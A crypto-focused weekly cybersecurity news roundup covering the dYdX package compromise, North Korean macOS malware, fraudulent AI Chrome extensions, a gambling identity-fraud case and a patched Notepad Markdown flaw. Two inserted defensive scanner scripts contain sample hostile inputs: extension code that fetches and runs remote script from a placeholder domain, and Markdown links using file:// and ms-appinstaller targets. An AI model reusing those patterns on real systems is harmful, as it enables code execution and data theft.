We’ve compiled the most significant cybersecurity news from the past week.

  • Hackers compromised the accounts of developers at the cryptocurrency exchange dYdX.
  • North Korean hackers employed new malware for macOS to steal cryptocurrency.
  • Malicious AI extensions for Chrome were installed by 300,000 users.
  • Two residents of Connecticut were charged with stealing $3 million.

Hackers Compromise dYdX Developers' Accounts

Malicious actors hacked the accounts of developers at the decentralized cryptocurrency exchange dYdX and injected malware into official software packages (npm and PyPI). The breach was discovered by Socket specialists.

The npm and PyPI packages are used by programmers to interact with the exchange's protocols, including wallet creation and transaction processing. Given that billions of dollars flow through dYdX, the scale of the threat is extremely high.

The attack targeted cryptocurrency wallet seed phrases. Once a developer interacted with the infected library, the malware copied access keys and sent them to the hackers' server. The attackers used website addresses that closely resembled the official exchange domains.

For developers using the Python version of the software, the situation was even worse: a remote access Trojan was installed on their systems. The malware activated in the background every 10 seconds, allowing the hackers to execute arbitrary code on the victim's computer. This let them steal not only cryptocurrency but also passwords and personal files, and monitor user activity.

Socket specialists noted that the hackers understood the internal structure of the system. They concealed the malicious code deep within legitimate files that run automatically.

After being alerted by experts, the exchange confirmed the breach and urged anyone who downloaded updates in January 2026 to immediately isolate their computers and transfer funds to new secure wallets.

1/ IMPORTANT SECURITY ANNOUNCEMENT — READ IF YOU HAVE USED VERSIONS OF DYDX-V4 CLIENTS HOSTED ON PyPI or NPM.

— dYdX (@dYdX) January 29, 2026

North Korean Hackers Use New macOS Malware to Steal Cryptocurrency

North Korean hackers are conducting targeted campaigns using AI-generated videos to deliver malware to cryptocurrency users. This was reported by Mandiant experts.

The attackers aim for financial gain, as indicated by the toolkit used in the attack on an unnamed fintech company. According to Mandiant, researchers discovered seven different families of macOS malware and attributed them to the UNC1069 group, which they have been monitoring since 2018.

The hackers contacted the victim via Telegram from a compromised account of a cryptocurrency company executive. After establishing trust, they sent a link to Calendly, which redirected the victim to a fake Zoom conference page hosted on the attackers' infrastructure.

The victim reported that the hackers showed a deepfake video of the cryptocurrency company's CEO. During the video call, the attacker simulated sound issues, using this pretext to instruct the victim on how to "fix errors" by executing commands that initiated a malware chain for both Windows and macOS.

Subsequently, the hackers deployed seven different families of malware:

  • WAVESHAPER — a backdoor that operates as a background service, collects system information, and downloads subsequent modules;
  • HYPERCALL — a loader for downloading malicious dynamic libraries directly into memory;
  • HIDDENCALL — a backdoor providing hackers direct access to the keyboard, command execution, and file operations;
  • SILENCELIFT — a minimalist backdoor that reports screen lock status to the hackers' server and can intercept messages in Telegram with root access;
  • DEEPBREATH — a data theft tool that bypasses macOS protections, stealing contents from the digital keychain, browser data, Telegram, and Apple Notes;
  • SUGARLOADER — a loader that uses encrypted configuration to obtain payloads for subsequent stages;
  • CHROMEPUSH — a browser data harvesting tool disguised as an "Offline Google Docs" extension that intercepts keystrokes, steals cookies, and takes screenshots.

Mandiant noted that the SILENCELIFT, DEEPBREATH, and CHROMEPUSH families represent a completely new toolkit for the group. Researchers described the volume of malware deployed on a single host against one individual as "unusual."

This confirms that the attack was highly specialized and aimed at gathering maximum data for two purposes: stealing cryptocurrency and preparing for future campaigns by stealing the victim's identity and contacts.

Malicious AI Chrome Extensions Installed by 300,000 Users

Thirty malicious AI extensions for Chrome were installed by over 260,000 users. This was reported by LayerX browser security researchers.

The discovered campaign masquerades as AI assistants with the goal of stealing credentials, email content, and information about visited pages.

All analyzed extensions are part of a single fraudulent network, as they connect to infrastructure on a single domain.

According to researchers, the most popular extension in the campaign was Gemini AI Sidebar (80,000 users), which has already been removed from the store. However, BleepingComputer found that other extensions with thousands of installations are still present in the Google repository:

  • AI Sidebar — 70,000 users;
  • AI Assistant — 60,000 users;
  • ChatGPT Translate — 30,000 users;
  • AI GPT — 20,000 users;
  • ChatGPT — 20,000 users;
  • Google Gemini — 10,000 users.

All 30 extensions share the same internal structure, JavaScript logic, and requested permissions. They do not contain AI functions within the code. Instead, they load content from a remote domain.

What is particularly dangerous is that developers can change the logic of the extension at any time on the server side without releasing an update. This approach allows them to bypass re-verification by Google moderators.
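A static triage script for the remote-loading pattern described above, written here as an added example rather than LayerX's or BleepingComputer's tooling. It inspects an unpacked extension's manifest and scripts for broad host permissions, Gmail match patterns, absolute remote URLs and constructs that run fetched text as code, then groups extensions by the domain they contact; the two sample extensions and the domain sidebar-assets.example are constructed placeholders, not the campaign's real code.

```python
import json
import re

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")  # group 1 = remote host
# Constructs that let server-supplied text run as code inside the extension.
DYNAMIC_EXEC_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\.innerHTML\s*="
                             r"|document\.createElement\s*\(\s*['\"]script['\"]|chrome\.scripting\.executeScript")
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def triage_extension(files):
    """files maps relative path -> file text for one unpacked extension."""
    manifest = json.loads(files["manifest.json"])
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])}
    remote_domains, dynamic_exec = set(), []
    for path, text in files.items():
        if path.endswith(".js"):
            remote_domains |= {h.lower() for h in URL_RE.findall(text)}
            if DYNAMIC_EXEC_RE.search(text):
                dynamic_exec.append(path)
    return {
        "broad_host_access": bool(hosts & BROAD_HOSTS),
        "targets_gmail": any("mail.google.com" in h for h in hosts),
        "remote_domains": sorted(remote_domains),
        "dynamic_exec_files": sorted(dynamic_exec),
        # The pattern described above: a local shell whose real logic comes from a server.
        "remote_logic": bool(remote_domains) and bool(dynamic_exec),
    }

def cluster_by_domain(extensions):
    """Group extension names by the remote domains their code contacts."""
    clusters = {}
    for name, files in extensions.items():
        for domain in triage_extension(files)["remote_domains"]:
            clusters.setdefault(domain, []).append(name)
    return {d: sorted(n) for d, n in clusters.items()}

# Constructed samples, not the campaign's real code; the domain is a placeholder.
SAMPLE_EXTENSIONS = {
    "AI Sidebar": {
        "manifest.json": json.dumps({"manifest_version": 3, "host_permissions": ["<all_urls>"],
            "content_scripts": [{"matches": ["https://mail.google.com/*"], "js": ["content.js"]}]}),
        "content.js": "fetch('https://sidebar-assets.example/app.js').then(r=>r.text()).then(t=>{"
                      "const s=document.createElement('script');s.textContent=t;document.head.append(s);});",
    },
    "ChatGPT Translate": {
        "manifest.json": json.dumps({"manifest_version": 3, "host_permissions": ["*://*/*"]}),
        "background.js": "fetch('https://sidebar-assets.example/cfg').then(r=>r.text()).then(c=>new Function(c)());",
    },
}
```

Run `cluster_by_domain(SAMPLE_EXTENSIONS)` over a directory of unpacked extensions to see which ones share a back end, which is the property the researchers used to tie the 30 extensions together.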

In the background, the extensions extract content from visited pages, including sensitive login pages:

  • Gmail tracking. Fifteen extensions specifically target Google Mail data. The script reads email text directly from the browser and can even intercept drafts;
  • Data leakage. When using features like "AI response generation," the email text is sent to the attackers' external servers, leaving the secure Gmail perimeter;
  • Surveillance. The software also has a voice recognition feature that can be activated remotely. Depending on permissions, it can record user conversations.

BleepingComputer reached out to Google for comment, but the corporation had not responded by the time of publication. Experts recommended checking LayerX's list of indicators of compromise, immediately removing any such extension, and changing passwords.

Connecticut Residents Charged with Stealing $3 Million

Two Connecticut residents have been charged with fraud involving gambling platforms and stolen personal data. This was reported by the U.S. Department of Justice.

According to the indictment, from April 2021 to 2026, the accomplices stole $3 million using the stolen personal information of approximately 3,000 victims.

The scheme worked as follows:

  • Data purchase. They acquired personal information of thousands of people on dark web markets and through the Telegram messenger;
  • Account creation. Using the data, they opened thousands of fake accounts on platforms like FanDuel, DraftKings, and BetMGM;
  • Data verification. The accused subscribed to background check services (TruthFinder, BeenVerified) to answer security questions during account verification;
  • Automation. One of the suspects maintained a spreadsheet containing names, birth dates, addresses, emails, and Social Security numbers of the victims.

"I was just browsing the list of Social Security numbers and used reverse phone lookup in the Scam Shield app," wrote accused Amitoy Kapoor in a text message to accomplice Siddharth Lillani.

When matches were found, the scammer created an account. In some cases, additional verification by BeenVerified was unnecessary.

The goal of the scheme was to obtain promotional bonuses offered by bookmakers for first deposits or bets. If such a bet won, the accused transferred the funds to prepaid virtual cards and then to their personal accounts.

Microsoft Fixes Remote Code Execution in Windows 11 Notepad

Microsoft patched a critical vulnerability in the Notepad application for Windows 11 that allowed hackers to execute local or remote programs. To exploit this, attackers only needed to trick the user into clicking on a specially crafted Markdown link, reports BleepingComputer.

With the release of Windows 11, Microsoft decided to retire WordPad and modernize Notepad. It was rewritten from scratch to add Markdown support, allowing users to format text and insert clickable links directly into Markdown files (.md).

According to reports, the issue stemmed from improper handling of special elements in commands. A hacker could create a Markdown file with malicious links using protocols like file:// (path to an executable file) or ms-appinstaller:// (application installation).

When such a file was opened in earlier versions of Notepad (including 11.2510) in Markdown mode, the text displayed as a link. After Ctrl+clicking it, the software would automatically launch the specified file or protocol handler. The main danger was that the launched program ran in the user's session with the user's access rights, and Windows did not display its standard warning about launching potentially dangerous files.

Security researchers found that such links could even point to files located on remote network shares. Since the patch was released, clicking such a link in Notepad prompts a warning dialog.
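A defender-side triage of Markdown files for the link schemes described above, added here as an example and not taken from BleepingComputer or Microsoft. It extracts inline links, autolinks and reference definitions with regular expressions (common Markdown syntaxes, not a full parser) and reports file:// and ms-appinstaller: targets, UNC paths to network shares, and any scheme outside a small allowlist; the sample document is constructed.

```python
import re
from urllib.parse import urlparse

# Schemes the report names as dangerous in Notepad's Markdown mode, and a
# conservative allowlist; anything with another scheme is reported as unknown.
DANGEROUS_SCHEMES = {"file", "ms-appinstaller"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
INLINE_LINK_RE = re.compile(r"\[[^\]]*\]\(\s*<?([^\s)>]+)>?[^)]*\)")  # [text](url "title")
AUTOLINK_RE = re.compile(r"<([a-zA-Z][a-zA-Z0-9+.-]*:[^>\s]+)>")      # <scheme:...>
REF_DEF_RE = re.compile(r"^\s{0,3}\[[^\]]+\]:\s*<?(\S+)>?")            # [id]: url

def classify_link(url):
    """Return 'dangerous', 'unc' or 'unknown', or None when the link is allowed."""
    if url.startswith("\\\\") or url.startswith("//"):
        return "unc"  # \\server\share path: a file on a remote network share
    scheme = urlparse(url).scheme.lower()
    if scheme in DANGEROUS_SCHEMES:
        return "dangerous"
    if not scheme or scheme in ALLOWED_SCHEMES:
        return None   # relative links carry no scheme and open nothing by themselves
    return "unknown"

def scan_markdown(text):
    """Return (line_no, url, verdict) for every link that is not plainly allowed."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        urls = INLINE_LINK_RE.findall(line) + AUTOLINK_RE.findall(line) + REF_DEF_RE.findall(line)
        for url in urls:
            verdict = classify_link(url)
            if verdict:
                findings.append((line_no, url, verdict))
    return findings

# Constructed sample; the hosts and paths are placeholders.
SAMPLE_MD = r"""# Release notes
See the [docs](https://example.com/docs) and mail <mailto:ops@example.com>.
[Open the tool](file:///C:/Users/Public/tool.exe)
Install: <ms-appinstaller:?source=https://updates.example/app.msix>
[share](\\fileserver.example\share\tool.exe)
[changelog]: ./CHANGELOG.md
"""

if __name__ == "__main__":
    for line_no, url, verdict in scan_markdown(SAMPLE_MD):
        print(f"line {line_no}: {verdict:9} {url}")
```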

Also on ForkLog:

  • Mass delistings strengthened Monero's monopoly in the dark web.
  • The winner of the X competition for $1 million was suspected of multiple rug pulls.
  • Eight years in prison and a $7.5 million payout: a court sentenced the former head of SafeMoon.
  • Experts assessed the new rules for cryptocurrency seizure in Russia.
  • The founder of FTX accused the Biden administration of political persecution.
  • In South Korea, an investigation was launched against Bithumb after a "giveaway" of bitcoins.
  • Tether froze $544 million in illegal funds at Turkey's request.

What to Read This Weekend?

In a new piece, ForkLog, along with the team from the Bitcoin mixer Mixer.Money, explores the consequences of data leaks and what can be done to minimize risks.